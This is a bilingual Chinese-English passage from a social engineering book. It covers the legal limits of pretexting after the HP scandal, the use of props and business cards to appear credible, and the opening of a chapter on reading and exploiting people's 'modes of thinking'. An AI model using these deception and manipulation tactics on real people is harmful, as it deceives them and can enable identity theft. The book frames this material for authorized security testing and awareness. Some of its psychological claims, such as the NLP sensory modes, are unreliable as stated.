  • 传呼机号码
  • Pager numbers
  •  
     
  • 细胞数量
  • Cell numbers
  •  
     
  • 社会保障号码
  • Social Security numbers
  •  
     
  • 信用报告
  • Credit reports
  •  
     
  • 邮政信箱信息
  • Post office box information
  •  
     
  • 银行帐户信息
  • Bank account information
  •  
     
  • 资产信息
  • Asset information
  •  
     
  • 其他消费者信息
  • Other consumer information
  •  
 

所有这些信息都是在专业社会工程学的一个灰色地带获得的:即使他们是受雇从事这些工作的,他们所做的是否合乎道德?许多专业社会工程师不会走到这一步。从这个非常重要的案例中可以吸取的教训是,作为一名专业社会工程师,你可以模仿恶意社会工程师的方法和思维,但绝不能完全屈从于他们的水平。这些顾问的问题在于,他们被授权借口、社会工程和审计惠普。他们无权对 AT&T、Verizon、公用事业公司等进行社会工程。在使用借口时,你必须对其进行概述和计划,以便了解你可以接近哪些法律界限以及你不能跨越哪些界限。

All of this information was obtained through a very gray area of professional social engineering: is what they did ethical and moral, even though they were hired to do it? Many professional social engineers would not go to these lengths. The lesson to be learned from this very important case is that as a professional social engineer you might mimic the methodologies and the thinking of malicious social engineers, but never should you stoop completely to their levels. The problem with these consultants came in that they were authorized to pretext, social engineer, and audit Hewlett-Packard. They were not authorized to social engineer AT&T, Verizon, utility companies, and so on. When employing pretexting you must have it outlined and planned so you know what legal lines you might get near and what lines you must not cross.

 

HP 的故事适合讨论政策、合同以及概述如果你是一名社会工程审计员,你将提供什么,但这些主题不在本章的讨论范围内。使用本章迄今为止概述的原则可以帮助你做出让你远离麻烦的决定。

HP’s story lends itself to a discussion about policy, contracts, and outlining what you will be offering if you are a social engineer auditor, but these topics are not within the context of this chapter. Using the principles outlined so far in this chapter can help you make decisions that will keep you out of trouble.

 

恶意借口的危险在于身份被盗,这使得它成为社会工程师渗透测试中非常重要的一部分。测试、检查和验证客户的员工不会落入恶意社会工程师使用的方法,可以大大保护您免受得逞的借口者的侵害。

The danger with malicious pretexting is the threat of identity theft, which makes it a very valid part of a social engineer pentest. Testing, checking, and verifying that your client’s employees will not fall for the methods used by malicious social engineers can go a long way in safeguarding you from a successful pretexter.

 

保持合法

Staying Legal

 

2005 年,《私人调查员》杂志采访了联邦贸易委员会 (FTC) 金融业务部副主任乔尔·温斯顿 (Joel Winston)。他的办公室负责监管和监控借口的使用(请参阅这篇有价值的文章的副本,网址为www.social-engineer.org/resources/book/ftc_article.htm)。

In 2005 Private Investigator Magazine was granted an interview with Joel Winston, Associate Director of the Federal Trade Commission (FTC), Division of Financial Practices. His office is in charge of regulating and monitoring the use of pretexting (see a copy of this valuable article at www.social-engineer.org/resources/book/ftc_article.htm).

 

以下是本次采访的一些要点:

Here are some of the key points from this interview:

 
 
     
  • 根据联邦贸易委员会的说法,借口是指通过欺诈、欺骗或误导性问题从银行或消费者那里获取任何信息,而不仅仅是财务信息。
  • Pretexting, according to the FTC, is the obtaining of any information from a bank or consumer, not just financial information, using fraud, deception, or misleading questions to obtain such information.
  •  
     
  • 根据联邦贸易委员会 (FTC) 对借口的定义,使用已获得的信息来验证目标是否为目标,即使使用虚假借口,也是合法的,除非社会工程师使用这些信息从金融机构获取信息。
  • Using already-obtained information to verify that a target is a target, even while using false pretenses, is legal under the FTC’s definition of pretexting, unless the social engineer is using this information to obtain information from a financial institution.
  •  
     
  • 通过欺骗性的商业手段获取收费电话或手机记录被视为非法借口。
  • Acquiring toll phone or cellular records through deceptive business practices is considered illegal pretexting.
  •  
 

FTC 网站为本次采访提供了一些澄清和补充信息:

The FTC website provides some clarity and additional information to this interview:

 
 
     
  • 任何人使用虚假、虚构或欺诈性的声明或文件从金融机构或直接从金融机构的客户那里获取客户信息都是违法的。
  • It is illegal for anyone to use false, fictitious, or fraudulent statements or documents to get customer information from a financial institution or directly from a customer of a financial institution.
  •  
     
  • 任何人使用伪造、伪造、丢失或被盗的文件从金融机构或直接从金融机构的客户那里获取客户信息都是违法的。
  • It is illegal for anyone to use forged, counterfeit, lost, or stolen documents to get customer information from a financial institution or directly from a customer of a financial institution.
  •  
     
  • 任何人要求他人使用虚假、虚构或欺诈性陈述或使用虚假、虚构或欺诈性文件或伪造、伪造、丢失或被盗的文件获取他人的客户信息都是违法的。
  • It is illegal for anyone to ask another person to get someone else’s customer information using false, fictitious, or fraudulent statements or using false, fictitious, or fraudulent documents, or forged, counterfeit, lost, or stolen documents.
  •  
 

尽管联邦贸易委员会的重点是金融机构,但所概述的指导方针提醒人们什么在美国被视为非法。调查当地法律并确保他们没有违反这些法律对专业社会工程师来说是一个好主意。2006 年,联邦贸易委员会扩大了《联邦贸易委员会法案》第 5 条的范围,专门包括了一项禁止使用借口获取电话记录的法律。

Although the FTC’s focus is on financial institutions, the guidelines outlined are a reminder of what is considered illegal in the United States. Looking into their local laws and making sure they are not breaking those laws is a good idea for professional social engineers. In 2006, the Federal Trade Commission moved to expand Section 5 of the FTC Act to specifically include a law banning the use of pretexting to retrieve telephone records.

 

HP 的借口最终导致一名私家侦探被指控犯有共谋和联邦身份盗窃罪——非常严重的指控。

HP’s pretexting situation ended in one of the private investigators being charged with conspiracy and federal identity theft—very serious charges.

 

要使借口合法化,就需要专业社会工程师进行一些研究,同时还要制定一个明确定义并签署的计划,说明将使用什么借口(如果有的话)。

Keeping pretexting legal will entail some research on the part of the professional social engineer as well as a clearly defined and signed-off plan of what pretexts, if any, will be used.

 

尽管前面提到了法律问题,但使用可靠的借口是进入公司最快捷的方法之一。借口本身就是一门技能,正如你从本章中看到的,它并不是简单地戴上假发或戴上假眼镜假装成别人。

Despite the legal matters mentioned earlier, using a solid pretext is one of the quickest ways into a company. Pretexting is a talent all its own and, as you can see from this chapter, is not simply putting on a wig or a pair of fake glasses and pretending you are someone you are not.

 

额外的借口工具

Additional Pretexting Tools

 

还有其他工具可以增强借口。

Other tools exist that can enhance a pretext.

 

道具可以在很大程度上让目标相信你的借口是真实的;例如,你的车辆的磁性标志、匹配的制服或服装、工具或其他随身行李,以及最重要的——名片。

Props can go a long way in convincing a target of the reality of your pretext; for example, magnetic signs for your vehicle, matching uniforms or outfits, tools or other carry-ons, and the most important—a business card.

 

最近我乘飞机去拉斯维加斯出差时,名片的力量让我大开眼界。我的笔记本电脑包通常会被扫描、重新扫描,然后被擦拭以检查是否有炸弹灰尘或其他东西。我是那种不介意额外安全预防措施的人,因为它们可以防止我在空中爆炸,我对此很满意。

The power of the business card hit me when I was recently flying to Las Vegas on business. My laptop bag usually gets scanned, rescanned, then swabbed for bomb dust or whatever. I am one of those guys who doesn’t really mind the extra security precautions because they keep me from blowing up in the air, and I am happy with that.

 

然而,我意识到 90% 的时间里,我都会受到运输安全管理局 (TSA) 的特别关注。在这次旅行中,我忘记从随身携带的笔记本电脑包中取出撬锁工具、RFID 扫描仪、四个备用硬盘、撞匙(见第 7 章)和大量无线黑客设备。当它通过扫描仪时,我听到做 X 光检查的女士说:“这到底是怎么回事?”

Yet I realize that 90 percent of the time I am going to get extra attention by Transportation Security Administration (TSA). On this particular trip I had forgotten to take my lock picks, RFID scanner, four extra hard drives, bump keys (see Chapter 7), and plethora of wireless hacking gear out of my carry-on laptop bag. As it goes through the scanner I hear the lady working the x-ray say, “What the heck?”

 

然后她叫来了另一位盯着屏幕的男士,他说:“我不知道那到底是什么东西。”然后他环顾四周,看到我微笑的脸,说道:“这是你吗?”

She then calls over another gentlemen who stares at the screen and says, “I have no clue what the heck that stuff is.” He then looks around, sees my smiling face, and says, “Is this you?”

 

当他正在清空我的 RFID 扫描仪和一大盒撬锁工具时,我和他一起走到桌子旁,他问道:“你为什么有这些东西,它们是什么?”

I walk over to the table with him as he is emptying my RFID scanner and my large case of lock picks and he says, “Why do you have all of these items and what are they?”

 

我没有任何计划,但在最后一刻决定尝试这一招:我拿出一张名片,说:“我是一名安全专家,专门测试网络、建筑物和人员的安全漏洞。这些都是我业务的工具。”我边说边递给他一张名片,他看了大约五秒钟,然后说:“哦,太好了。谢谢你的解释。”

I had nothing planned but decided at the last second to try this move: I pulled out a business card and said, “I am security professional who specializes in testing networks, buildings, and people for security holes. These are the tools of my business.” I said this as I handed him a business card and he looked at it for about five seconds and then said, “Oh, excellent. Thanks for the explanation.”

 

他把我的所有东西都整齐地放回去,拉上袋子的拉链,然后放我走了。通常我会经过炸弹安检、小型除尘机,然后进行搜身,但这次我得到的只是一声谢谢和快速放行。我开始分析我与平常有什么不同。唯一的不同是我给了他一张名片。当然,我的名片不是在线卡片打印机的 9.99 美元特价,但令我惊讶的是,名片似乎为我的要求增添了一种许可感。

He neatly put all my items back in, zipped the bag up, and let me go. Usually I go through the bomb screening, the little dust machine, and then a patdown, but this time all I got was a thank you and a quick release. I began to analyze what I did differently than normal. The only difference was that I had given him a business card. Granted, my business card is not the $9.99 special from an online card printer, but I was amazed that what seemed to have happened was that a business card added a sense of license to my claims.

 

接下来的四次飞行,我特意把所有能找到的“黑客”设备都装进包里,然后在口袋里放了一张名片。每次有人检查我的包,问我包里的东西时,我都会拿出名片。每次他们都会向我道歉,把我的东西整齐地装进去,然后我就走了。

My next four flights I purposely packed every “hacking” device into my bags I could find and then kept a business card in my pocket. Each time my bag was examined and I was asked about the contents, I flipped out the card. Each time I was apologized to, had my items packed in neatly, and let go.

 

想象一下我的经历是一个借口。小细节可以给我说的话增加很多分量,这样我就可以显得可信、可靠、可靠,只需要一张名片就可以告诉人们我说的都是真的。不要低估名片的力量。提醒一句:拿到一张看起来软弱无力的名片实际上会产生相反的效果。一张背面有广告的“免费”名片不会给专业借口增加分量。然而,没有理由花 300 美元买一张只用一次的名片。许多在线名片打印机可以打印少量非常漂亮的卡片,价格不到 100 美元。

Imagine my experience was a pretext. Little details can add so much weight to what I am saying that I can appear valid, trustworthy, and solid with nothing more than a card that tells people that everything I say is true. Don’t underestimate the power of a business card. One word of caution: getting a weak and pathetic-looking business card can actually cause the opposite effect. A business card that was “free” with an advertisement on the back will not add weight to a professional pretext. Yet there is no reason to spend $300 on a business card to use once. Many online business card printers can print a small amount of very nice cards for less than $100.

 

认真对待本章的另一个原因是,职业身份窃贼通常首先会使用伪装。由于身份盗窃最近在犯罪行业中占据了主导地位,因此了解身份盗窃是什么以及如何识别身份盗窃对于消费者、企业和安全专业人员来说非常重要。如果您是安全审计员,您必须帮助您的客户意识到这些威胁并测试它们是否存在可能的弱点。

Another reason to take this chapter very seriously is that often times pretexting is the very first step used by professional identity thieves. Because identity theft is taking a front row seat in the crime industry of late, knowing what it is and how to identify it is important for consumers, businesses, and security professionals. If you are a security auditor you must help your clients become aware of these threats and test them for possible weaknesses.

 

概括

Summary

 

除了广泛介绍借口和提供现实世界中借口使用的例子外,本章还不断触及影响借口不同方面的心理学原理。该框架的下一个合乎逻辑的站点就涵盖了这一点——专业社会工程师使用的心理技能,这些技能使他们看起来像是精神控制大师,并让每个社会工程师在成功方面都占据了巨大的优势。

In addition to extensively covering pretexting and providing real-world examples of pretexting in action, this chapter also continually brushed up against the psychological principles that affect different aspects of pretexting. The logical next stop on the framework covers just that—the mental skills that professional social engineers use that make them seem like mind control masters and that give each social engineer a huge leg up in success.

 

第五章

Chapter 5

 

心理技巧:社会工程学中使用的心理学原理

Mind Tricks: Psychological Principles Used in Social Engineering

 

这一切都取决于我们如何看待事物,而不是事物本身如何。

It all depends on how we look at things, and not on how they are themselves.

 

—卡尔·古斯塔夫·荣格

—Carl Gustav Jung

 

在好莱坞电影和电视节目中,骗子和执法人员被描绘成拥有近乎神秘的才能。他们有能力逃脱任何惩罚;他们似乎能够只看一个人的眼睛就能判断出他们是在撒谎还是在说实话。这种情况并不罕见:警察看着嫌疑犯的眼睛,就能自动判断他是在撒谎还是在说实话,或者仅仅凭借暗示的力量,骗子的目标就会交出他们一生的积蓄。电影可能会让你相信操纵策略和让人们做任何你想做的事是可行的,甚至很容易。这些场景真的是虚构的吗?有可能获得这种在电影中为幻想而保留的能力吗?

In Hollywood movies and television shows con men and law enforcement are portrayed with almost mystical talents. They have the ability to get away with anything; they seem to be able to just look into the eyes of a person and tell if they are lying or telling the truth. It is not uncommon to see situations like this: the cop looks into the eyes of his suspect and can automatically tell whether he is lying or telling the truth, or with just the power of suggestion the con man’s targets are handing over their life’s savings. Movies might have you believing that manipulation tactics and getting people to do anything you want is plausible or even easy. Are these scenarios really fiction? Is it possible to gain such abilities that are saved for fantasy in the movies?

 

这一章本身就可以写成一本书,但我将把这些信息浓缩为真正改变你与人交往方式的原则。本章中的一些主题基于各自领域最聪明的人所做的研究。这些主题中讨论的技术在社会工程环境中经过了测试和检验。例如,微表情的主题基于世界著名心理学家和研究员保罗·埃克曼博士的研究,他利用自己的天才开发了阅读面部表情的技术,这些技术可以真正改变执法部门、政府、医生和普通人与他人的互动方式。

This chapter could be a book unto itself, but I will condense this information down to principles that will truly change the way you interact with people. Some of the topics in this chapter are based on research done by the brightest minds in their respective fields. The techniques discussed in these topics were tested and put through the paces in social engineering environments. For example, the topic of microexpressions is based on the research of the world-renowned psychologist and researcher, Dr. Paul Ekman, who used his genius to develop techniques into reading facial expressions that can literally change the way law enforcement, governments, doctors, and everyday people interact with others.

 

神经语言编程的创始人理查德·布兰德勒和约翰·格林德的一些原则改变了人们对思维模式和语言力量的理解。这些话题是备受争议的话题,本章试图揭开这个话题的神秘面纱,并解释如何在社会工程中使用它们。

Some of the principles of Richard Brandler and John Grinder, the originators of neurolinguistic programming, changed people’s understanding about thought patterns and the power of words. These topics are subjects for much debate, and this chapter attempts to demystify this subject and explain how you can use them in social engineering.

 

世界上一些最优秀的审讯人员开发了培训和框架,帮助执法人员学习如何有效地审讯嫌疑人。这些原则有着如此深厚的心理根源,以至于学习所使用的方法实际上可以打开目标的思想之门。

Some of the best interrogators on the planet developed training and frameworks to help law enforcement learn how to effectively interrogate suspects. These principles have such deep psychological roots that learning the methods used can literally unlock the doors to the minds of your targets.

 

利用人们在言语、手势、眼神和面部表情中给出的暗示,可以让你看起来像是一个会读心术的人。本章将探讨这些技巧并对其进行详细解释,以便专业社会工程师能够利用它们。

Using cues that people give in their speech, gestures, eyes, and faces can make you appear to be a mind reader. This chapter examines these skills and explains them in detail so they can be utilized by a professional social engineer.

 

融洽关系是销售培训师和销售人员经常使用的词语,但它是获得信任和展示信心的一个非常重要的方面。知道如何立即与人建立融洽关系是一项真正增强社交工程师技能的技能,本章将向您展示如何做到这一点。

Rapport is often a word used by sales trainers and salespeople, but it is a very important aspect of gaining trust and displaying confidence. Knowing how to instantly develop rapport with people is a skill that truly enhances the skill set of a social engineer, and this chapter shows you how.

 

本章以我个人对如何使用这些技能来破解人类思维的研究作为结束。缓冲区溢出是一种通常由黑客编写的程序,用于通过正常使用主机程序来执行恶意代码。执行时,程序会执行黑客想要的操作。如果有可能对人类思维运行“命令”,使目标按照你的要求行事,提供你寻求的信息,从本质上证明人类思维是可以被操纵的,那会怎样?

This chapter finishes with my own personal research on how you can use these skills to hack the human mind. A buffer overflow is a program usually written by a hacker to execute code, of malicious intent normally, through the normal use of a host program. When executed the program does what the hacker wants. What if it were possible to run “commands” on the human mind that would cause the target to do what you ask, give over information you seek, and, in essence, prove that the human mind is able to be manipulated?

 

当然,这些强有力的信息可能会被用于非常恶意的目的。我以这种方式向公众发布这些信息的目的是,通过揭露“坏人”的方法、思维和原则,然后分析每一个,并展示你可以从中学到什么,从而揭开“坏人”所做的事情的面纱。揭露这些技术可以让每个人都更容易识别、防御和减轻这些攻击。

This powerful information, of course, can be used for very malicious intentions. My goal in releasing this information to the public in this way is to pull back the curtain from what the “bad guys” are doing by exposing their methods, thinking, and principles, then analyzing each one and showing what you can learn from it. Exposing these techniques makes identifying, defending, and mitigating against these attacks easier for everyone.

 

本章确实是令人大开眼界的数据和原则集合。遵循、学习和研究这些方法不仅会增强任何安全努力,而且这些原则还可以改变您与他人沟通和互动的方式。

This chapter is truly a mind-altering collection of data and principles. Following, studying, and researching the methods will not just enhance any security endeavors but these principles can also alter the way you communicate and interact with others.

 

不过,本章绝不是涵盖每项技能所有方面的完整集合。我提供了链接和提示,您可以在那里找到更多信息和程序来帮助您提高这些技能。本章奠定了基础,并充当指南,为您指明方向,以便您可以随着时间的推移学习提高每项技能。

By no means, though, is this chapter a complete collection that covers all aspects of each of these skills. I provide links and tips to where you can find more information and programs to help you enhance these skills. This chapter sets a foundation as well as acts like a guide, pointing you in a direction so you can learn to enhance each skill over time.

 

学习社会工程学技能不是一个快速的过程,所以不要急躁。学习这些技能的方法可能需要数年才能完善,甚至需要大量练习才能熟练掌握。当然,你可能拥有某一方面的技能,但如果没有,不要急于学习。继续努力和练习,你就会掌握它。

Learning social engineering skills is not a quick process, so don’t be impatient. The methods of learning some of these skills can take years to perfect and a lot of practice to even become proficient. Of course, you may possess a skill for a certain aspect but if you do not, don’t become impatient with trying to learn it. Keep on trying harder and practicing and you will get it.

 

在深入了解本章内容之前,以下部分将介绍这些原则为何以及如何发挥作用。您必须了解现有的思维模式。在您更清楚地了解人们如何接收和处理信息之后,您就可以开始理解该过程的情感、心理和身体表现。

Before you get into the meat of this chapter, the following section sets the stage for why and how these principles will work. You must understand the modes of thinking that exist. After you understand more clearly how people take in and process information you can begin to understand the emotional, psychological, and physical representations of that process.

 

思维模式

Modes of Thinking

 

要改变某人的思维方式,你必须了解人们的思维方式和思维模式。这似乎是尝试社会工程这一方面的合理第一步。

To alter someone’s way of thinking you must understand the way people think and in what modes they think. This seems a logical first step to even attempting this aspect of social engineering.

 

你可能认为你需要成为一名心理学家或神经学家才能了解人类思维的方方面面。虽然这会有所帮助,但这并不是必需的。通过一些研究和一些实际应用,你可以深入了解人类思维的内部运作。

You might think you need to be a psychologist or a neurologist to understand the many aspects of how a person can think. Although that can help, it is not necessary. With a little research and some practical application you can delve into the inner workings of the human mind.

 

2001 年 8 月,美国联邦调查局发布了一份执法公报(www.social-engineer.org/wiki/archives/ModesOfThinking/MOT_FBI_3of5.htm),对人们的思维方式做出了一些非常深刻的论述:

In August of 2001 the FBI put out a law enforcement bulletin (www.social-engineer.org/wiki/archives/ModesOfThinking/MOT_FBI_3of5.htm) that made a few very profound statements on the modes in which people think:

 

只需向客户确认您的非语言行为,使用客户喜欢的表征系统中的语言并匹配语音音量、语调和语音区域,通常就能克服客户的沟通不情愿。

Simply confirming your nonverbal behavior to the client, using language from the client’s preferred representational system and matching speech volume, tone, and area of speech often overcomes client reluctance to communicate.

 

这句简单的话却蕴含着深刻的内涵。基本上,这句话的意思是,如果你能先弄清楚目标的主导思维模式,然后以微妙的方式证实这一点,你就能打开目标的思想之门,让他在告诉你哪怕是私密的细节时都能感到安心。那么,你可能会顺理成章地问:“我如何弄清楚目标的主导思维模式?”

This simple statement has a lot of depth in it. Basically it is saying that if you can first figure out the target’s dominant mode of thinking and then confirm it in subtle ways, you can unlock the doors of the target’s mind and help him actually feel at ease when telling you even intimate details. Logically you may ask then, “How do I figure out a target’s dominant mode of thinking?”

 

即使问人们他们的思维模式是什么,也无法给出明确的答案,因为许多人不知道他们经常处于哪种思维模式。因此,作为一名社会工程师,你必须有一些工具来帮助你确定这种模式,然后快速切换以适应这种模式。有一条清晰而简单的路径可以找到这个答案,但你需要先了解基础知识。

Even asking people what their mode of thinking is will not offer a clear answer, because many people do not know what mode of thinking they often reside in. Due to that, as a social engineer you must have some tools to help you determine this mode and then quickly switch gears to match that mode. A clear and easy path exists to this answer but you need to know the basics first.

 

感官

The Senses

 

几个世纪以来,哲学家们一直在争论感知的价值。有些人甚至认为现实不是“真实的”,只是我们的感官构建的感知。就我个人而言,我不赞同这种观点,但我相信世界是由我们的感官带到我们大脑中的。人们将这些感官解读为对现实的感知。在传统的分类中,我们有五种感官:视觉、听觉、触觉、嗅觉和味觉。

For centuries philosophers have argued the value of perception. Some go so far as to say that reality is not “real” but just what our senses build into our perceptions. Personally, I do not subscribe to that idea, but I believe that the world is brought to our brain by our senses. People interpret those senses for their perception of reality. In the traditional classification we have five senses: sight, hearing, touch, smell, and taste.

 

人们倾向于偏爱其中一种感觉,而这种感觉就是主导感觉。这也是人们记忆事物的方式。作为确定主导感觉的一项练习,闭上眼睛,想象自己今天早上醒来——你记得的第一件事是什么?

People tend to favor one of these senses and that is the one that is dominant. It is also the way people tend to remember things. As one exercise to determine your dominant sense, close your eyes and picture yourself waking up this morning—what is the very first thing you remember?

 

是温暖的阳光照在你脸上的感觉吗?还是你还记得你的配偶或孩子呼唤你的声音?你是否清楚地记得楼下的咖啡香味?或者很可能是嘴里有异味,提醒你需要刷牙了?

Was the feeling of the warm sun on your face? Or maybe you remember the sound of the voice of your spouse or children calling you? Do you remember clearly the smell of coffee downstairs? Or quite possibly the bad taste in your mouth, reminding you that you need to brush your teeth?

 

当然,这门科学并不精确,要弄清楚你的主导感觉是什么可能需要尝试几次。我曾经和一对夫妇谈论过这个概念,观察他们的表情很有趣。妻子首先记得醒来后看到时钟,然后担心自己迟到了,而丈夫首先记得翻身后感觉不到妻子在他身边。问了几个问题后,很明显丈夫是动觉型,或者说他的主要感觉是感觉,而他的妻子则非常注重视觉。

Of course, this science is not exact and realizing what your dominant sense is may take a few tries to figure out. I once talked to a couple about this concept and it was interesting to watch their expressions. The wife first remembered waking up and seeing the clock and then worrying that she was running late, whereas the husband first remembered rolling over and not feeling his wife next to him. After some more questions it became evident that the husband was a kinesthetic, or his dominant sense was his feeling, whereas his wife was very visual.

 

当然,走到目标面前说:“闭上眼睛,告诉我你今天早上记得的第一件事”,这似乎不太合理。当然,除非你的借口是家庭心理医生,否则你可能会在这条路上遇到一些反对。

Of course, walking up to your target and saying, “Close your eyes and tell me the first thing you remember this morning,” doesn’t seem reasonable. Unless, of course, your pretext is the family shrink, you might meet with some opposition on this route.

 

如果不经过令人尴尬的早晨例行询问,你如何能确定目标对象的主导感觉是什么呢?

How can you determine without going through an embarrassing interrogation about their morning rituals what a target’s dominant sense is?

 

三种主要思维模式

The Three Main Modes of Thinking

 

虽然我们有五种感官,但思维模式仅与其中三种相关:

Although we have five senses, the modes of thinking are associated with only three of them:

 
 
     
  • 视觉,或者视觉思考者
  • Sight, or a visual thinker
  •  
     
  • 听觉,或者说听觉思考者
  • Hearing, or an auditory thinker
  •  
     
  • 感觉,或者说动觉思考者
  • Feeling, or a kinesthetic thinker
  •  
 

每种感觉都有一个工作范围,或称子感性。某个东西是不是太响还是太轻?太亮还是太暗?太热还是太冷?例如:盯着太阳看太亮,喷气发动机声音太大,而 -30 华氏度又太冷。伊万·巴甫洛夫做过一个实验,每次喂狗时他都会摇铃。最后,狗会听到铃声,然后流口水。大多数人不知道的是,他对子感性的身体和情感方面更感兴趣。有趣的是,铃声响得越大,狗流的口水就越多。子感性的范围变化产生了直接的物理变化。巴甫洛夫的研究和所有讲座均在www.ivanpavlov.com上进行了详细讨论。

Each sense has a range within which it works, or a sub-modality. Is something too loud or too soft? Too bright or too dark? Too hot or too cold? Examples of these are as follows: staring at the sun is too bright, jet engines are too loud, and –30 degrees Fahrenheit is too cold. Ivan Pavlov ran an experiment where he rang a bell every time he fed a dog. In the end the dog would hear the sound of the bell, then salivate. What most people don’t know is that he was more interested in the physical and emotional aspects of sub-modalities. The interesting point is that the louder the bell rang the more the dog salivated. The range change of the sub-modality produced a direct physical change. Pavlov’s research and all of his lectures are discussed in much detail at www.ivanpavlov.com.

 

尽管人与狗截然不同,巴甫洛夫的研究对于理解人的思维方式非常重要。我们中的许多人都能用这三种模式思考,但我们在一种模式下占主导地位——一种模式“响亮”得最响。即使在我们占主导地位的模式中,我们对这种占主导地位的感觉的深度也可能不同。

Even though people are very different from dogs, Pavlov’s research is very important in understanding how a person thinks. Many of us can think in all three modes, but we dominate in one—one “rings” the loudest. Even within our dominant mode, we might have varying degrees of depth for that dominant sense.

 

接下来我将更深入地讨论每种模式的一些细节。

Following I will discuss some of the details of each of these modes in more depth.

 

视觉的

Visual

 

大多数人通常都是视觉思考者,他们通常记得事物的样子。他们清楚地记得场景——颜色、纹理、亮度或黑暗。他们可以清楚地描绘过去的事件,甚至可以为未来的事件构建画面。当他们面对需要做出决定的材料时,他们通常需要看到一些东西,因为视觉输入与决策直接相关。很多时候,视觉思考者会根据视觉上吸引他的东西做出决定,而不管什么对他来说真正“更好”。

The majority of people are usually visual thinkers, in that they usually remember what something looked like. They remember the scene clearly—the colors, the textures, the brightness or darkness. They can clearly picture a past event and even build a picture for a future event. When they are presented with material to decide upon they often need something to see because visual input is directly linked to decision making. Many times a visual thinker will make a decision based on what is visually appealing to him regardless of what is really “better” for him.

 

虽然男性倾向于视觉,但这并不意味着所有男性都是视觉型的。视觉营销或视觉元素通常对男性有吸引力,这是事实,但不要假设所有男性都是视觉型的。

Although men tend to be visual, this does not mean that all men are always visual. That visual marketing or visual aspects normally appeal to men is true, but do not assume all men are visual.

 

视觉型的人在讲话中经常使用某些词语,例如:

A visual person often uses certain words in his speech, such as:

 
 
     
  • “我明白你的意思了。”
  • “I see what you mean.”
  •  
     
  • “我觉得这很好。”
  • “That looks good to me.”
  •  
     
  • “我现在明白了。”
  • “I get the picture now.”
  •  
 

对于视觉思考者来说,主导感官的作用范围可以具有某些特征或子模式,例如:

And the range that the dominant sense works in for a visual thinker can have certain characteristics, or sub-modalities, such as:

 
 
     
  • 光(明亮或昏暗)
  • Light (bright or dim)
  •  
     
  • 尺寸(大或小)
  • Size (large or small)
  •  
     
  • 颜色(黑白或彩色)
  • Color (black and white or color)
  •  
     
  • 运动(快或慢)
  • Movement (fast or slow)
  •  
     
  • 焦点(清晰或模糊)
  • Focus (clear or hazy)
  •  
 

在没有视觉输入的情况下,试图辩论、推销、谈判、操纵或影响视觉思考者是非常困难的,甚至是不可能的。视觉思考者需要视觉输入来做出决定。

Trying to debate, sell, negotiate, manipulate, or influence a visual thinker with no visual input is very difficult if not impossible. Visual thinkers need visual input to make decisions.

 

听觉

Auditory

 

听觉型思考者会记住事件的声音。他们会记得闹钟太响或女人低声细语。他们会回忆起孩子声音的甜美或狗叫的可怕声音。听觉型思考者从听到的内容中学习得更好,他们从被告知的内容中记住的东西比从展示的内容中记住的东西多得多。

Auditory thinkers remember the sounds of an event. They remember that the alarm was too loud or the woman whispered too low. They recall the sweetness of the child’s voice or the scary bark of the dog. Auditory people learn better from what they hear and can retain far more from being told things than being shown things.

 

因为听觉思考者会记住某种声音的方式,或者因为声音本身有助于回忆,所以他可能会使用如下短语:

Because an auditory thinker remembers the way something sounded, or because the sounds themselves help recall memories, he may use phrases such as:

 
 
     
  • “声音响亮,清晰明了……”
  • “Loud and clear…”
  •  
     
  • “有什么东西告诉我……”
  • “Something tells me…”
  •  
     
  • “我觉得这听起来不错。”
  • “That sounds okay to me.”
  •  
 

这种主导意义的范围可以在这些子模态中:

And the range of this dominant sense can be within these sub-modalities:

 
 
     
  • 音量(大或小)
  • Volume (loud or soft)
  •  
     
  • 音调(低音或高音)
  • Tone (base or treble)
  •  
     
  • 音调(高或低)
  • Pitch (high or low)
  •  
     
  • 节奏(快或慢)
  • Tempo (fast or slow)
  •  
     
  • 距离(近或远)
  • Distance (near or far)
  •  
 

与听觉型思维者交谈时,一定要谨慎选择用词。他们听到的单词将决定交易的成败。我曾见过,由于对听觉型思维者说错了一个词,整个会面就从美好变成了灾难。

It is imperative to choose your words carefully with auditory thinkers. The words they hear will make or break the deal. I have seen whole encounters go from great to a disaster with one wrong word spoken to an auditory thinker.

 

动觉

Kinesthetic

 

动觉型思考者关心的是感觉。他们会记得某个事件给他们带来的感受——房间的温暖、拂过皮肤的微风、电影让他们如何因恐惧而从座位上跳起来。动觉型思考者通常会用手触摸物品来感受物品。仅仅告诉他们某样东西是柔软的,不如让他们触摸它更真实。但帮助他们回忆起之前触摸过的柔软物品可以唤起对动觉型思考者来说非常真实的情绪和感觉。

Kinesthetic thinkers are concerned with feelings. They remember how an event made them feel—the warmth of the room, the beautiful breeze on their skin, how the movie made them jump out of their seat with fear. Often kinesthetic thinkers feel things with their hands to get the sense of the objects. Merely telling them something is soft isn’t as real as letting them touch it. But helping recall a soft item they touched before can recall emotions and feelings that are very real to a kinesthetic thinker.

 

“动觉”一词与身体的触觉、内脏和自我感觉有关——基本上是指一个人的身体在空间中的位置以及对某事让他感觉如何的自我意识。动觉思考者使用以下短语:

The term “kinesthetic” relates to tactile, visceral, and sense-of-self sensations of the body—basically, where a person’s body is in space and the self-awareness of how something made him feel. A kinesthetic thinker uses phrases such as:

 
 
     
  • “我能够理解这个想法。”
  • “I can grasp that idea.”
  •  
     
  • “这给你什么感觉?”
  • “How does that grab you?”
  •  
     
  • “我会联系你。”
  • “I’ll get in touch with you.”
  •  
     
  • “我只是想联系一下。”
  • “I just wanted to touch base.”
  •  
     
  • “感觉怎么样?”
  • “How does this feel?”
  •  
 

此类型的范围可具有以下子模式:

And the range for this type can have the following sub-modalities:

 
 
     
  • 强度(强或弱)
  • Intensity (strong or weak)
  •  
     
  • 面积(大或小)
  • Area (large or small)
  •  
     
  • 纹理(粗糙或光滑)
  • Texture (rough or smooth)
  •  
     
  • 温度(热或冷)
  • Temperature (hot or cold)
  •  
     
  • 重量(重或轻)
  • Weight (heavy or light)
  •  
 

帮助动觉型思考者回忆与某事相关的感觉或情绪,可以让这些情绪重现得和第一次出现时一样真实。动觉型思考者可能是非动觉型思考者最难对付的,因为他们对视觉和声音没有反应,而社会工程师必须接触他们的感受才能与这种类型的思考者沟通。

Helping a kinesthetic thinker recall a feeling or emotion tied to something can make those emotions reappear as real as the first time they occurred. Kinesthetic thinkers are probably the most difficult for non-kinesthetic thinkers to deal with because they do not react to sights and sounds and social engineers have to get in touch with their feelings to communicate with this type of thinker.

 

了解这些基本原则有助于快速辨别你正在交谈的人的类型。同样,如果不要求目标人物想象他的早晨习惯,你怎么能辨别出他的主要感觉呢?更重要的是,为什么这如此重要?

